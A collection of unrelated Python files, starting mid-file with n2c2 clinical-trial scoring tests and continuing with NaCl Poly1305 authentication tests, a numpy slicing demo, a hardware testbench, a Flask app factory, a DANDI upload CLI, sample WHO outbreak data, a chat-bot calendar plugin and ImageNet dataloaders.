score_card[ 'exact' ].loc[ score_card[ 'exact' ].shape[ 0 ] ] = \
[ '203.xml' , -1 , -1 , 'ABDOMINAL' , 'not met' , 'TP' ]
score_card[ 'exact' ].loc[ score_card[ 'exact' ].shape[ 0 ] ] = \
[ '203.xml' , -1 , -1 , 'MAJOR-DIABETES' , 'met' , 'TP' ]
score_card[ 'exact' ].loc[ score_card[ 'exact' ].shape[ 0 ] ] = \
[ '203.xml' , -1 , -1 , 'ADVANCED-CAD' , 'met' , 'TP' ]
score_card[ 'exact' ].loc[ score_card[ 'exact' ].shape[ 0 ] ] = \
[ '203.xml' , -1 , -1 , 'MI-6MOS' , 'not met' , 'TP' ]
score_card[ 'exact' ].loc[ score_card[ 'exact' ].shape[ 0 ] ] = \
[ '203.xml' , -1 , -1 , 'KETO-1YR' , 'not met' , 'TP' ]
score_card[ 'exact' ].loc[ score_card[ 'exact' ].shape[ 0 ] ] = \
[ '203.xml' , -1 , -1 , 'DIETSUPP-2MOS' , 'met' , 'FN' ]
score_card[ 'exact' ].loc[ score_card[ 'exact' ].shape[ 0 ] ] = \
[ '203.xml' , -1 , -1 , 'DIETSUPP-2MOS' , 'not met' , 'FP' ]
score_card[ 'exact' ].loc[ score_card[ 'exact' ].shape[ 0 ] ] = \
[ '203.xml' , -1 , -1 , 'ASP-FOR-MI' , 'not met' , 'TP' ]
score_card[ 'exact' ].loc[ score_card[ 'exact' ].shape[ 0 ] ] = \
[ '203.xml' , -1 , -1 , 'HBA1C' , 'not met' , 'TP' ]
score_card[ 'exact' ].loc[ score_card[ 'exact' ].shape[ 0 ] ] = \
[ '203.xml' , -1 , -1 , 'CREATININE' , 'not met' , 'FN' ]
score_card[ 'exact' ].loc[ score_card[ 'exact' ].shape[ 0 ] ] = \
[ '203.xml' , -1 , -1 , 'CREATININE' , 'met' , 'FP' ]
##
score_card[ 'exact' ].loc[ score_card[ 'exact' ].shape[ 0 ] ] = \
[ '303.xml' , -1 , -1 , 'DRUG-ABUSE' , 'not met' , 'TP' ]
score_card[ 'exact' ].loc[ score_card[ 'exact' ].shape[ 0 ] ] = \
[ '303.xml' , -1 , -1 , 'ALCOHOL-ABUSE' , 'not met' , 'TP' ]
score_card[ 'exact' ].loc[ score_card[ 'exact' ].shape[ 0 ] ] = \
[ '303.xml' , -1 , -1 , 'ENGLISH' , 'met' , 'TP' ]
score_card[ 'exact' ].loc[ score_card[ 'exact' ].shape[ 0 ] ] = \
[ '303.xml' , -1 , -1 , 'MAKES-DECISIONS' , 'met' , 'TP' ]
score_card[ 'exact' ].loc[ score_card[ 'exact' ].shape[ 0 ] ] = \
[ '303.xml' , -1 , -1 , 'ABDOMINAL' , 'met' , 'TP' ]
score_card[ 'exact' ].loc[ score_card[ 'exact' ].shape[ 0 ] ] = \
[ '303.xml' , -1 , -1 , 'MAJOR-DIABETES' , 'met' , 'FN' ]
score_card[ 'exact' ].loc[ score_card[ 'exact' ].shape[ 0 ] ] = \
[ '303.xml' , -1 , -1 , 'MAJOR-DIABETES' , 'not met' , 'FP' ]
score_card[ 'exact' ].loc[ score_card[ 'exact' ].shape[ 0 ] ] = \
[ '303.xml' , -1 , -1 , 'ADVANCED-CAD' , 'not met' , 'TP' ]
score_card[ 'exact' ].loc[ score_card[ 'exact' ].shape[ 0 ] ] = \
[ '303.xml' , -1 , -1 , 'MI-6MOS' , 'not met' , 'TP' ]
score_card[ 'exact' ].loc[ score_card[ 'exact' ].shape[ 0 ] ] = \
[ '303.xml' , -1 , -1 , 'KETO-1YR' , 'not met' , 'TP' ]
score_card[ 'exact' ].loc[ score_card[ 'exact' ].shape[ 0 ] ] = \
[ '303.xml' , -1 , -1 , 'DIETSUPP-2MOS' , 'met' , 'TP' ]
score_card[ 'exact' ].loc[ score_card[ 'exact' ].shape[ 0 ] ] = \
[ '303.xml' , -1 , -1 , 'ASP-FOR-MI' , 'met' , 'TP' ]
score_card[ 'exact' ].loc[ score_card[ 'exact' ].shape[ 0 ] ] = \
[ '303.xml' , -1 , -1 , 'HBA1C' , 'not met' , 'FN' ]
score_card[ 'exact' ].loc[ score_card[ 'exact' ].shape[ 0 ] ] = \
[ '303.xml' , -1 , -1 , 'HBA1C' , 'met' , 'FP' ]
score_card[ 'exact' ].loc[ score_card[ 'exact' ].shape[ 0 ] ] = \
[ '303.xml' , -1 , -1 , 'CREATININE' , 'met' , 'TP' ]
return score_card
def initialize_for_track1():
command_line_args = [ '--reference-input' , 'tests/data/n2c2_2018_track-1_reference' ,
'--test-input' , 'tests/data/n2c2_2018_track-1_test' ,
'--empty-value' , '0.0' ]
args = args_and_configs.get_arguments( command_line_args )
## TODO - we are usurping the test for this done within init_args to make
## the test more protable, for now.
args.empty_value = float( args.empty_value )
file_mapping = { '103.xml': '103.xml' , '203.xml': '203.xml' , '303.xml': '303.xml' }
return( args , file_mapping )
#############################################
## Test print_score_summary()
#############################################
def test_perfect_track1_output( capsys ):
score_card = initialize_perfect_track1_score_card()
args , file_mapping = initialize_for_track1()
##
scoring_metrics.print_2018_n2c2_track1( score_card ,
file_mapping ,
args )
track1_out, err = capsys.readouterr()
track1_out = track1_out.strip()
##
expected_values = [
[ '*******************************************' , 'TRACK' , '1' , '********************************************' ] ,
[ '------------' , 'met' , '-------------' , '------' , 'not' , 'met' , '-------' , '--' , 'overall' , '---' ] ,
[ 'Prec.' , 'Rec.' , 'Speci.' , 'F(b=1)' , 'Prec.' , 'Rec.' , 'F(b=1)' , 'F(b=1)' , 'AUC' ] ,
[ 'Abdominal' , 1.0000 , 1.0000 , 1.0000 , 1.0000 , 1.0000 , 1.0000 , 1.0000 , 1.0000 , 1.0000 ] ,
[ 'Advanced-cad' , 1.0000 , 1.0000 , 1.0000 , 1.0000 , 1.0000 , 1.0000 , 1.0000 , 1.0000 , 1.0000 ] ,
[ 'Alcohol-abuse' , 0.0000 , 0.0000 , 1.0000 , 0.0000 , 1.0000 , 1.0000 , 1.0000 , 0.5000 , 0.5000 ] ,
[ 'Asp-for-mi' , 1.0000 , 1.0000 , 1.0000 , 1.0000 , 1.0000 , 1.0000 , 1.0000 , 1.0000 , 1.0000 ] ,
[ 'Creatinine' , 1.0000 , 1.0000 , 1.0000 , 1.0000 , 1.0000 , 1.0000 , 1.0000 , 1.0000 , 1.0000 ] ,
[ 'Dietsupp-2mos' , 1.0000 , 1.0000 , 1.0000 , 1.0000 , 1.0000 , 1.0000 , 1.0000 , 1.0000 , 1.0000 ] ,
[ 'Drug-abuse' , 0.0000 , 0.0000 , 1.0000 , 0.0000 , 1.0000 , 1.0000 , 1.0000 , 0.5000 , 0.5000 ] ,
[ 'English' , 1.0000 , 1.0000 , 0.0000 , 1.0000 , 0.0000 , 0.0000 , 0.0000 , 0.5000 , 0.5000 ] ,
[ 'Hba1c' , 0.0000 , 0.0000 , 1.0000 , 0.0000 , 1.0000 , 1.0000 , 1.0000 , 0.5000 , 0.5000 ] ,
[ 'Keto-1yr' , 0.0000 , 0.0000 , 1.0000 , 0.0000 , 1.0000 , 1.0000 , 1.0000 , 0.5000 , 0.5000 ] ,
[ 'Major-diabetes' , 1.0000 , 1.0000 , 1.0000 , 1.0000 , 1.0000 , 1.0000 , 1.0000 , 1.0000 , 1.0000 ] ,
[ 'Makes-decisions' , 1.0000 , 1.0000 , 0.0000 , 1.0000 , 0.0000 , 0.0000 , 0.0000 , 0.5000 , 0.5000 ] ,
[ 'Mi-6mos' , 0.0000 , 0.0000 , 1.0000 , 0.0000 , 1.0000 , 1.0000 , 1.0000 , 0.5000 , 0.5000 ] ,
[ '------------------------------' , '----------------------' , '--------------' ] ,
[ 'Overall' , '(micro)' , 1.0000 , 1.0000 , 1.0000 , 1.0000 , 1.0000 , 1.0000 , 1.0000 , 1.0000 , 1.0000 ] ,
[ 'Overall' , '(macro)' , 0.6154 , 0.6154 , 0.8462 , 0.6154 , 0.8462 , 0.8462 , 0.8462 , 0.7308 , 0.7308 ] ,
[ '' ] ,
[ '3' , 'files' , 'found' ] ]
##
track1_values = []
for track1_line in track1_out.split( "\n" ):
track1_line = track1_line.strip()
track1_values.append( re.split( r' +' , track1_line ) )
for track1_line, expected_line in zip( track1_values , expected_values ):
for tmp_val, expected_val in zip( track1_line , expected_line ):
## The mixture of str and float values requires us to
## make a type check first...
if( isinstance( expected_val , str ) ):
assert tmp_val == expected_val
elif( expected_val is None or
tmp_val == 'None' ):
## ...if either are None, then both must be None
assert expected_val is None
assert tmp_val == 'None'
else:
## ...followed by an float conversion mapping to
## an approximate equality due to rounding differences
## between Py2 and Py3
assert float( tmp_val ) == approx( expected_val )
def test_track1_output_with_errors( capsys ):
score_card = initialize_track1_score_card_with_errors()
args , file_mapping = initialize_for_track1()
##
scoring_metrics.print_2018_n2c2_track1( score_card ,
file_mapping ,
args )
track1_out, err = capsys.readouterr()
track1_out = track1_out.strip()
##
expected_values = [
[ '*******************************************' , 'TRACK' , '1' , '********************************************' ] ,
[ '------------' , 'met' , '-------------' , '------' , 'not' , 'met' , '-------' , '--' , 'overall' , '---' ] ,
[ 'Prec.' , 'Rec.' , 'Speci.' , 'F(b=1)' , 'Prec.' , 'Rec.' , 'F(b=1)' , 'F(b=1)' , 'AUC' ] ,
[ 'Abdominal' , 1.0000 , 1.0000 , 1.0000 , 1.0000 , 1.0000 , 1.0000 , 1.0000 , 1.0000 , 1.0000 ] ,
[ 'Advanced-cad' , 1.0000 , 1.0000 , 1.0000 , 1.0000 , 1.0000 , 1.0000 , 1.0000 , 1.0000 , 1.0000 ] ,
[ 'Alcohol-abuse' , 0.0000 , 0.0000 , 1.0000 , 0.0000 , 1.0000 , 1.0000 , 1.0000 , 0.5000 , 0.5000 ] ,
[ 'Asp-for-mi' , 1.0000 , 1.0000 , 1.0000 , 1.0000 , 1.0000 , 1.0000 , 1.0000 , 1.0000 , 1.0000 ] ,
[ 'Creatinine' , 0.5000 , 1.0000 , 0.5000 , 0.6667 , 1.0000 , 0.5000 , 0.6667 , 0.6667 , 0.7500 ] ,
[ 'Dietsupp-2mos' , 1.0000 , 0.5000 , 1.0000 , 0.6667 , 0.5000 , 1.0000 , 0.6667 , 0.6667 , 0.7500 ] ,
[ 'Drug-abuse' , 0.0000 , 0.0000 , 1.0000 , 0.0000 , 1.0000 , 1.0000 , 1.0000 , 0.5000 , 0.5000 ] ,
[ 'English' , 1.0000 , 1.0000 , 0.0000 , 1.0000 , 0.0000 , 0.0000 , 0.0000 , 0.5000 , 0.5000 ] ,
[ 'Hba1c' , 0.0000 , 0.0000 , 0.6667 , 0.0000 , 1.0000 , 0.6667 , 0.8000 , 0.4000 , 0.3333 ] ,
[ 'Keto-1yr' , 0.0000 , 0.0000 , 1.0000 , 0.0000 , 1.0000 , 1.0000 , 1.0000 , 0.5000 , 0.5000 ] ,
[ 'Major-diabetes' , 1.0000 , 0.5000 , 1.0000 , 0.6667 , 0.5000 , 1.0000 , 0.6667 , 0.6667 , 0.7500 ] ,
[ 'Makes-decisions' , 1.0000 , 1.0000 , 0.0000 , 1.0000 , 0.0000 , 0.0000 , 0.0000 , 0.5000 , 0.5000 ] ,
[ 'Mi-6mos' , 0.0000 , 0.0000 , 1.0000 , 0.0000 , 1.0000 , 1.0000 , 1.0000 , 0.5000 , 0.5000 ] ,
[ '------------------------------' , '----------------------' , '--------------' ] ,
[ 'Overall' , '(micro)' , 0.8750 , 0.8750 , 0.9130 , 0.8750 , 0.9130 , 0.9130 , 0.9130 , 0.8940 , 0.8940 ] ,
[ 'Overall' , '(macro)' , 0.5769 , 0.5385 , 0.7821 , 0.5385 , 0.7692 , 0.7821 , 0.7538 , 0.6462 , 0.6603 ] ,
[ '' ] ,
[ '3' , 'files' , 'found' ] ]
##
track1_values = []
for track1_line in track1_out.split( "\n" ):
track1_line = track1_line.strip()
track1_values.append( re.split( r' +' , track1_line ) )
for track1_line, expected_line in zip( track1_values , expected_values ):
for tmp_val, expected_val in zip( track1_line , expected_line ):
## The mixture of str and float values requires us to
## make a type check first...
if( isinstance( expected_val , str ) ):
assert tmp_val == expected_val
elif( expected_val is None or
tmp_val == 'None' ):
## ...if either are None, then both must be None
assert expected_val is None
assert tmp_val == 'None'
else:
## ...followed by an float conversion mapping to
## an approximate equality due to rounding differences
## between Py2 and Py3
assert float( tmp_val ) == approx( expected_val )
|
# 20140105
# Jan Mojzis
# Public domain.
import sys
import nacl.raw as nacl
from util import fromhex, flip_bit
def exc():
"""
"""
a, b, c = sys.exc_info()
return b
def onetimeauth_bad_test():
"""
"""
k = nacl.randombytes(nacl.crypto_onetimeauth_KEYBYTES)
m = nacl.randombytes(1)
a = nacl.crypto_onetimeauth(m, k)
#save exception string
exc_string = ""
ax = flip_bit(a)
try:
a = nacl.crypto_onetimeauth(ax, k)
except:
exc_string = exc()
bad = []
tmp = {"k":k, "m":m, "a":a}
tmp["k"] = nacl.randombytes(nacl.crypto_onetimeauth_KEYBYTES + 1)
bad.append(tmp)
tmp = {"k":k, "m":m, "a":a}
tmp["k"] = nacl.randombytes(nacl.crypto_onetimeauth_KEYBYTES - 1)
bad.append(tmp)
tmp = {"k":k, "m":m, "a":a}
tmp["k"] = 0
bad.append(tmp)
tmp = {"k":k, "m":m, "a":a}
tmp["m"] = 0
tmp["a"] = 0
bad.append(tmp)
for tmp in bad:
try:
nacl.crypto_onetimeauth(tmp["m"], tmp["k"])
except:
pass
else:
raise Exception("crypto_onetimeauth accepts incorrect input data")
try:
nacl.crypto_onetimeauth_open(tmp["a"], tmp["k"])
except:
if exc_string == exc():
raise
else:
raise Exception("crypto_onetimeauth_open accepts incorrect input data")
def onetimeauth_test():
"""
"""
return
mlen = 0
while 1:
mlen = mlen + 1 + int(mlen / 16)
if mlen > 10000:
break
k = nacl.randombytes(nacl.crypto_onetimeauth_KEYBYTES)
m = nacl.randombytes(mlen)
a = nacl.crypto_onetimeauth(m, k)
nacl.crypto_onetimeauth_verify(a, m, k)
if mlen < 1:
continue
a1 = flip_bit(a)
try:
nacl.crypto_onetimeauth_verify(a1, m, k)
except:
pass
else:
raise ValueError("forgery")
def onetimeauth_constant_test():
"""
"""
x = nacl.crypto_onetimeauth
x = nacl.crypto_onetimeauth_verify
x = nacl.crypto_onetimeauth_BYTES
x = nacl.crypto_onetimeauth_IMPLEMENTATION
x = nacl.crypto_onetimeauth_KEYBYTES
x = nacl.crypto_onetimeauth_PRIMITIVE
x = nacl.crypto_onetimeauth_VERSION
def onetimeauth_poly1305_test():
"""
"""
k = "eea6a7251c1e72916d11c2cb214d3c252539121d8e234e652d651fa4c8cff880"
m = "8e993b9f48681273c29650ba32fc76ce48332ea7164d96a4476fb8c531a1186a"
m = m + "c0dfc17c98dce87b4da7f011ec48c97271d2c20f9b928fe2270d6fb863d51738"
m = m + "b48eeee314a7cc8ab932164548e526ae90224368517acfeabd6bb3732bc0e9da"
m = m + "99832b61ca01b6de56244a9e88d5f9b37973f622a43d14a6599b1f654cb45a74"
m = m + "e355a5"
r = "f3ffc7703f9400e52a7dfb4b3d3305d9"
a = nacl.crypto_onetimeauth(fromhex(m), fromhex(k))
if a != fromhex(r):
raise ValueError("invalid authenticator")
def onetimeauth_poly1305_test2():
"""
"""
k = "eea6a7251c1e72916d11c2cb214d3c252539121d8e234e652d651fa4c8cff880"
m = "8e993b9f48681273c29650ba32fc76ce48332ea7164d96a4476fb8c531a1186a"
m = m + "c0dfc17c98dce87b4da7f011ec48c97271d2c20f9b928fe2270d6fb863d51738"
m = m + "b48eeee314a7cc8ab932164548e526ae90224368517acfeabd6bb3732bc0e9da"
m = m + "99832b61ca01b6de56244a9e88d5f9b37973f622a43d14a6599b1f654cb45a74"
m = m + "e355a5"
a = "f3ffc7703f9400e52a7dfb4b3d3305d9"
nacl.crypto_onetimeauth_verify(fromhex(a), fromhex(m), fromhex(k))
def onetimeauth_poly1305_constant_test():
"""
"""
if nacl.crypto_onetimeauth_BYTES != 16:
raise ValueError("invalid crypto_onetimeauth_BYTES")
if nacl.crypto_onetimeauth_KEYBYTES != 32:
raise ValueError("invalid crypto_onetimeauth_KEYBYTES")
x = nacl.crypto_onetimeauth
x = nacl.crypto_onetimeauth_IMPLEMENTATION
x = nacl.crypto_onetimeauth_VERSION
x = nacl.crypto_onetimeauth_verify
def run():
"""
"""
onetimeauth_test()
onetimeauth_bad_test()
onetimeauth_constant_test()
onetimeauth_poly1305_test()
onetimeauth_poly1305_test2()
onetimeauth_poly1305_constant_test()
if __name__ == '__main__':
run()
|
import numpy as np
def print_matrix(data):
print('[')
for d2 in range(np.shape(data)[0]):
print(" ",list(data[d2]))
print(']')
def print_array(data):
print(" ".join(list(["%d" % i for i in data])))
x = np.array([[1,2,3],[4,5,6]])
print_matrix(x)
"""
x[0,:]
"""
print_array(x[0,:])
"""
x[1,1:]
"""
y = x[1,1:]
print_array(y)
"""
x[1,:2]
"""
x[1,:2] = 5
print_array(y)
print_matrix(x)
x = np.array([[1,2,3],[4,5,6]])
print_matrix(x)
"""
x[:,0]
"""
print_array(x[:,0])
"""
x[:,1]
"""
print_array(x[:,1])
x = np.array([[[1,2,3],[4,5,6]],[[11,12,13],[14,15,16]]])
#print_matrix(x)
"""
x[0,:] Not Support
It is not supportable if the number of arguments and the number of dimensions are different.
print_matrix(x[0,:])
"""
"""
x[0,1,:]
"""
print_array(x[0,1,:])
|
import os,sys,random
import veri
NewName = os.path.expanduser('~')
sys.path.append('%s/vlsistuff/verification_libs3'%NewName)
import logs
Monitors=[]
cycles=0
GIVEUP_TIMEOUT = 10000 # how many cycles to run before retirment.
import encrypt_piped_efficiency
enc = encrypt_piped_efficiency.encrypt_piped_efficiency('tb.dut.',Monitors)
enc.run = enc.run_posedge_clk
import sequenceClass
seq = sequenceClass.sequenceClass('tb',Monitors,'',[])
def sequence(TestName):
Seq = logs.bin2string(TestName)
seq.readfile(Seq)
logs.setVar('sequence',Seq)
Dir = os.path.dirname(Seq)
logs.setVar('testsdir',Dir)
logs.log_info('SEQUENCE %d'%len(seq.Sequence))
def cannot_find_sig(Sig):
logs.log_error('cannot find "%s" signal in the design'%Sig)
KEY = '0x0123456789abcdef4455667788'
class driverMonitor(logs.driverClass):
def __init__(self,Path,Monitors):
logs.driverClass.__init__(self,Path,Monitors)
self.QUEUE = []
def run(self):
self.force('key',KEY)
vldin = int(random.randint(0,100)>75)
if vldin:
datain = random.randint(0,0xffffffff)
self.force('datain',datain)
self.QUEUE.append(datain)
else:
self.force('datain',0)
self.force('vldin',vldin)
if self.valid('vldout'):
dataout = self.peek('encrypted')
In = self.QUEUE.pop(0)
logs.log_info('IN %08x OUT %08x' % (In,dataout))
drv = driverMonitor('tb',Monitors)
def negedge():
global cycles
cycles += 1
veri.force('tb.cycles',str(cycles))
if (cycles>GIVEUP_TIMEOUT):
logs.log_info('finishing on default guard of %d'%GIVEUP_TIMEOUT)
enc.onFinish()
logs.closeLogs()
veri.finish()
rst_n = veri.peek('tb.rst_n')
if (rst_n!='1'):
return
if (cycles==30):
veri.listing('tb','100','deep.list')
if (cycles>30):
for Mon in Monitors: Mon.run()
def cucu():
veri.force('tb.datain','0')
veri.force('tb.key','0')
veri.force('tb.vldin','0')
encrypted = logs.peek('tb.encrypted')
vldout = logs.peek('tb.vldout')
|
"""
project.instance
Create and expose the Flask application
"""
from flask import Flask, render_template
def create_app():
application = Flask('app')
from app.project import config
application.config.from_object(config)
from app.project.database import db_init
application.db = db_init()
from app.project.routes import routes_init
routes_init(application)
return application
application = create_app()
|
import click
from .base import (
devel_debug_option,
devel_option,
instance_option,
map_to_click_exceptions,
)
from ..consts import collection_drafts
@click.command()
# @dandiset_path_option(
# help="Top directory (local) of the dandiset. Files will be uploaded with "
# "paths relative to that directory. If not specified, current or a parent "
# "directory containing dandiset.yaml file will be assumed "
# )
@click.option(
"-e",
"--existing",
type=click.Choice(["error", "skip", "force", "overwrite", "refresh"]),
help="What to do if a file found existing on the server. 'skip' would skip"
"the file, 'force' - force reupload, 'overwrite' - force upload if "
"either size or modification time differs; 'refresh' - upload only if "
"local modification time is ahead of the remote.",
default="refresh",
show_default=True,
)
@click.option(
"--validation",
help="Data must pass validation before the upload. Use of this option is highly discouraged.",
type=click.Choice(["require", "skip", "ignore"]),
default="require",
show_default=True,
)
@click.argument("paths", nargs=-1) # , type=click.Path(exists=True, dir_okay=False))
# &
# Development options: Set DANDI_DEVEL for them to become available
#
# TODO: should always go to dandi for now
@instance_option()
# TODO: should always go into 'drafts' (consts.collection_drafts)
@devel_option(
"-c", "--girder-collection", help="For development: Girder collection to upload to"
)
# TODO: figure out folder for the dandiset
@devel_option("--girder-top-folder", help="For development: Girder top folder")
#
@devel_option(
"--fake-data",
help="For development: fake file content (filename will be stored instead of actual load)",
default=False,
is_flag=True,
)
@devel_option(
"--allow-any-path",
help="For development: allow DANDI 'unsupported' file types/paths",
default=False,
is_flag=True,
)
@devel_option(
"--upload-dandiset-metadata",
help="For development: do upload dandiset metadata",
default=False,
is_flag=True,
)
@devel_debug_option()
@map_to_click_exceptions
def upload(
paths,
existing="refresh",
validation="require",
dandiset_path=None,
# Development options should come as kwargs
girder_collection=collection_drafts,
girder_top_folder=None,
dandi_instance="dandi",
fake_data=False, # TODO: not implemented, prune?
allow_any_path=False,
upload_dandiset_metadata=False,
devel_debug=False,
):
"""Upload dandiset (files) to DANDI archive.
Target dandiset to upload to must already be registered in the archive and
locally "dandiset.yaml" should exist in `--dandiset-path`. If you have not
yet created a dandiset in the archive, use 'dandi register' command first.
Local dandiset should pass validation. For that it should be first organized
using 'dandiset organize' command.
By default all files in the dandiset (not following directories starting with a period)
will be considered for the upload. You can point to specific files you would like to
validate and have uploaded.
"""
from ..upload import upload
upload(
paths,
existing=existing,
validation=validation,
dandiset_path=dandiset_path,
girder_collection=girder_collection,
girder_top_folder=girder_top_folder,
dandi_instance=dandi_instance,
fake_data=fake_data,
allow_any_path=allow_any_path,
upload_dandiset_metadata=upload_dandiset_metadata,
devel_debug=devel_debug,
)
|
from distutils.core import setup
# setup
setup(title="pyblast", name="pyblast", version="1.0.0a", packages=["pyblast"])
|
sample_who_response = [{
"url": "https://www.who.int/csr/don/2005_08_31/en/",
"date_of_publication": "2005-08-31 xx:xx:xx",
"headline": "Yellow fever in Guinea",
"main_text": "WHO has received reports of 7 cases and 4 deaths from yellow fever in the region of Fouta Djalon. Four cases including 3 deaths have been reported in Mamou, a town of 236 000 inhabitants which grew around the railway line from Conakry to Kankan. Mamou acts as an important transport hub in the country. These cases have been laboratory confirmed by the WHO Collaborating Centre for Yellow Fever, the Institut Pasteur, Dakar, Senegal. In addition, 3 cases including 1 death have been reported from Dalaba, a city of 136,000 inhabitants, 50 km from Mamou.",
"reports": [{
"event_date": "2005-08-31 xx:xx:xx",
"diseases": ["yellow fever"],
"syndromes": [],
"locations": [{
"city": "Mamou",
"state": "Mamou Prefecture",
"country": "Guinea",
"continent": "Africa"
}, {
"city": "Dalaba",
"state": "Mamou Prefecture",
"country": "Guinea",
"continent": "Africa"
}]
}]
}, {
"url": "https://www.who.int/csr/don/2005_09_22/en/",
"date_of_publication": "2005-09-22 xx:xx:xx",
"headline": "Yellow fever in Burkina Faso and Côte d'Ivoire",
"main_text": "WHO has received reports of an outbreak of yellow fever in Batie, Gaoua and Banfora districts in Burkina Faso in the southeast of the country, near the border with Côte d'Ivoire. Four cases including 1 death have been laboratory confirmed by Centre Muraz, Burkina Faso and by the WHO Collaborating Centre for Yellow Fever, the Institut Pasteur, Dakar, Senegal. The fatal case, a boy of 4 years old, came from Bouna region in Côte d'Ivoire. A team from the Ministry of Health and WHO in Burkina Faso and a team from the Ministry of Health, WHO and UNICEF in Côte d'Ivoire quickly investigated the outbreak in this cross border area characterized by increased population movements. A mass vaccination campaign is being prepared in both countries to protect the population at risk and to prevent the spread of the disease to densely populated urban settings. The WHO Regional Office for Africa is working with both Ministries to determine the most appropriate strategies for disease control in the cross border area and to raise funds for outbreak response activities.",
"reports": [{
"event_date": "2005-08-31 xx:xx:xx",
"diseases": ["yellow fever"],
"syndromes": [],
"locations": [{
"city": "Batie",
"state": "Noumbiel Province",
"country": "Burkina Faso",
"continent": "Africa"
}, {
"city": "Gaoua",
"state": "Poni Province",
"country": "Burkina Faso",
"continent": "Africa"
}, {
"city": "Banfora",
"state": "Comoe Province",
"country": "Burkina Faso",
"continent": "Africa"
}, {
"city": "Bouna",
"state": "Zanzan District",
"country": "Côte d'Ivoire",
"continent": "Africa"
}]
}]
}]
|
# BS mark.1-55
# /* coding: utf-8 */
# BlackSmith plugin
# © WitcherGeralt (WitcherGeralt@jabber.ru)
def command_calendar(mType, source, body):
import calendar
date = time.gmtime()
y, z = 0, 0
if body:
body = body.split()
x = body.pop(0)
if check_nubmer(x):
z = int(x)
if body and check_number(body[0]):
y = int(body.pop(0))
if z not in xrange(1, 13):
y = (date.tm_year)
z = (date.tm_mon)
elif y <= 0:
y = (date.tm_year)
Ans_1 = "\nCalendar:\n*\n*\tM/Y: %s\n*\n*\t%s\n*\nCurrent Date/Time: %s"
clndr = ((calendar.month(y, z)).strip()).splitlines()
Ans_2 = clndr.pop(0)
Ans_3 = "\n*\t".join(clndr)
reply(mType, source, Ans_1 % (Ans_2, Ans_3, time.asctime(date)))
del calendar
command_handler(command_calendar, 10, "calend")
|
from __future__ import print_function
import os
import os.path
from PIL import Image
import torch.utils.data as data
import torchvision.transforms as transforms
from torch.utils.data.dataloader import DataLoader
from data.utils import TransformTwice, RandomTranslateWithReflect
def find_classes_from_folder(dir):
classes = [d for d in os.listdir(dir) if os.path.isdir(os.path.join(dir, d))]
classes.sort()
class_to_idx = {classes[i]: i for i in range(len(classes))}
return classes, class_to_idx
def find_classes_from_file(file_path):
with open(file_path) as f:
classes = f.readlines()
classes = [x.strip() for x in classes]
classes.sort()
class_to_idx = {classes[i]: i for i in range(len(classes))}
return classes, class_to_idx
def make_dataset(dir, classes, class_to_idx):
samples = []
for target in classes:
d = os.path.join(dir, target)
if not os.path.isdir(d):
continue
for root, _, fnames in sorted(os.walk(d)):
for fname in sorted(fnames):
path = os.path.join(root, fname)
item = (path, class_to_idx[target])
if 'JPEG' in path or 'jpg' in path:
samples.append(item)
return samples
IMG_EXTENSIONS = [
'.jpg', '.JPG', '.jpeg', '.JPEG',
'.png', '.PNG', '.ppm', '.PPM', '.bmp', '.BMP',
]
def pil_loader(path):
return Image.open(path).convert('RGB')
class ImageFolder(data.Dataset):
def __init__(self, transform=None, target_transform=None, samples=None, loader=pil_loader):
if len(samples) == 0:
raise (RuntimeError("Found 0 images in subfolders \n"
"Supported image extensions are: " + ",".join(IMG_EXTENSIONS)))
self.samples = samples
self.transform = transform
self.target_transform = target_transform
self.loader = loader
def __getitem__(self, index):
path = self.samples[index][0]
target = self.samples[index][1]
img = self.loader(path)
if self.transform is not None:
img = self.transform(img)
if self.target_transform is not None:
target = self.target_transform(target)
return img, target, index
def __len__(self):
return len(self.samples)
def ImageNetLoader882(batch_size, num_workers, split='train', shuffle=False,
imagenet_path='data_shallow14/datasets/ImageNet/', split_path='data/splits/imagenet_rand118/'):
classes_118, class_to_idx_118 = find_classes_from_file(split_path + 'imagenet_118.txt')
samples_118 = make_dataset(imagenet_path + split, classes_118, class_to_idx_118)
classes_1000, _ = find_classes_from_folder(imagenet_path + split)
classes_882 = list(set(classes_1000) - set(classes_118))
class_to_idx_882 = {classes_882[i]: i for i in range(len(classes_882))}
samples_882 = make_dataset(imagenet_path + split, classes_882, class_to_idx_882)
if split == 'train':
transform = transforms.Compose([
transforms.RandomResizedCrop(224),
transforms.RandomHorizontalFlip(),
transforms.ToTensor(),
transforms.Normalize(mean=[0.485, 0.456, 0.406], std=[0.229, 0.224, 0.225])
])
else:
transform = transforms.Compose([
transforms.Resize(256),
transforms.CenterCrop(224),
transforms.ToTensor(),
transforms.Normalize(mean=[0.485, 0.456, 0.406], std=[0.229, 0.224, 0.225])
])
dataset = ImageFolder(transform=transform, samples=samples_882)
dataloader_882 = DataLoader(dataset, batch_size=batch_size, shuffle=shuffle, num_workers=num_workers,
pin_memory=True)
return dataloader_882
def ImageNetLoader30(batch_size, num_workers=2, shuffle=False, imagenet_path='data_shallow14/datasets/ImageNet/',
split_path='data/splits/imagenet_rand118/', aug=None, subset='A', subfolder='train'):
# dataloader of 30 classes
classes_30, class_to_idx_30 = find_classes_from_file(split_path + 'imagenet_30_{}.txt'.format(subset))
samples_30 = make_dataset(imagenet_path + subfolder, classes_30, class_to_idx_30)
if aug == None:
transform = transforms.Compose([
transforms.Resize(256),
transforms.CenterCrop(224),
transforms.ToTensor(),
transforms.Normalize(mean=[0.485, 0.456, 0.406], std=[0.229, 0.224, 0.225])
])
elif aug == 'once':
transform = transforms.Compose([
transforms.RandomResizedCrop(224, scale=(0.5, 1.0)),
transforms.RandomHorizontalFlip(),
transforms.ToTensor(),
transforms.Normalize(mean=[0.485, 0.456, 0.406], std=[0.229, 0.224, 0.225])
])
elif aug == 'twice':
transform = TransformTwice(transforms.Compose([
transforms.Resize(256),
transforms.RandomCrop(224),
RandomTranslateWithReflect(4),
transforms.RandomHorizontalFlip(),
transforms.ToTensor(),
transforms.Normalize((0.507, 0.487, 0.441), (0.267, 0.256, 0.276)),
]))
dataset = ImageFolder(transform=transform, samples=samples_30)
dataloader_30 = DataLoader(dataset, batch_size=batch_size, shuffle=shuffle, num_workers=num_workers,
pin_memory=True)
return dataloader_30
def ImageNetLoader800from882(batch_size, num_workers, split='train', imagenet_path='data_shallow14/datasets/ImageNet/',
split_path='data/splits/imagenet_rand118/'):
# this dataloader split the 882 classes into train + val = 882
classes_118, class_to_idx_118 = find_classes_from_file(split_path + 'imagenet_118.txt')
samples_118 = make_dataset(imagenet_path + 'train', classes_118, class_to_idx_118)
